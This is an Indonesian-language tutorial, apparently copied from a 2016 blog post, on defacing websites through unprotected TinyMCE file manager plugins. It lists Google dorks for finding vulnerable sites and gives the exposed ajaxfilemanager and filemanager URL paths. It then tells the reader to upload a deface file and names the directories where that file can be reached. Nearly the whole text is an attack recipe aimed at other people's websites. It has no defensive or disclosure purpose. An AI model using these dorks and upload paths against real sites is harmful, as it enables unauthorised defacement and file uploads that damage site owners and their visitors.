Cara Deface Website Metode TinyMCE File Upload

  TinyMCE ( kecil Moxiecode Content Editor ) adalah , kontrol editor WYSIWYG berbasis browser platform-independen , yang ditulis dalam JavaScript dan dirilis sebagai perangkat lunak open -source di bawah LGPL oleh Ephox . Ia memiliki kemampuan untuk mengkonversi bidang textarea HTML atau elemen HTML lainnya untuk kasus redaksi . TinyMCE dirancang untuk mudah mengintegrasikan dengan sistem manajemen konten , termasuk Django , Drupal , Joomla !, WordPress , dan SOY CMS . Selebihnya can lihat - lihat disini http://www.tinymce.com 



Baiklah, kita mulai saja cara deface metode TinyMCE File Upload:

 
1. Cari target menggunakan dork dibawah. Silahkan kembangkan sendiri.

                          inurl:"/tiny_mce/"

                          inurl:"/tiny_mce/plugins/"

                          inurl:"/tiny_mce/jscripts/"

                          inurl:"/tiny_mce/plugins/ajaxfilemanager/"

 

2. Jika target telah ditemukan, tambahkan exploitnya (beda exploit, beda tampilan/cara => "use your brain" ajalah):

       [site]/tinymce/jscripts/tiny_mce/plugins/filemanager/examples.html

       [site]/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php

 
3. Unggah file deface kalian (tunggu prosesnya).

4. Jika file sudah terunggah, file tersebut terdapat pada kolom (seperti pada gambar).

5. buka file kalian melalui:

       [site]/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/files/[filekalian]

       [site]/images/[filekalian]

       [site]/upload/[filekalian]

Sumber : http://azisalvriyanto.blogspot.co.id/2016/03/cara-deface-website-metode-tinymce-file-upload.html